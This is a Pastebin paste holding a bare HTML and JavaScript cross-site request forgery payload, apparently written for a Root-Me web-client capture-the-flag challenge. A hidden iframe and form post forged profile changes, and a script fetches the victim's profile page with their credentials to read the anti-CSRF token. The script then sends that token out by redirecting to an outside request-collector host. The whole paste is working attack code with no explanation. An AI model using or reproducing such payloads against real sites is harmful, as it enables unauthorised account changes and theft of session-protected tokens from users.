Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html><body><div>albsjdbasd</div>
- <iframe style="display:none" name="csrf-frame"></iframe>
- <form method='POST' action='http://challenge01.root-me.org/web-client/ch23/?action=profile' target="csrf-frame" id="csrf-form" enctype="multipart/form-data">
- <input type='hidden' name='username' value='asd'>
- <input type='hidden' name='status' value='on'>
- <input type='hidden' id='token2' name='token' value='blablabla' >
- <input type='submit' value='submit'>
- </form>
- <script>
- function getTokenJS() {
- var xhr = new XMLHttpRequest();
- var input = '';
- xhr.withCredentials = true;
- xhr.responseType = "document";
- xhr.open("GET", 'http://challenge01.root-me.org/web-client/ch23/index.php?action=profile', true);
- xhr.onload = function (e) {
- if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
- page = xhr.response
- input = page.getElementById("token");
- }
- };
- document.location='http://tutututu.free.beeceptor.com/?c='+input.value;
- xhr.send(null);
- }
- getTokenJS();
- </script>
- </body></html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
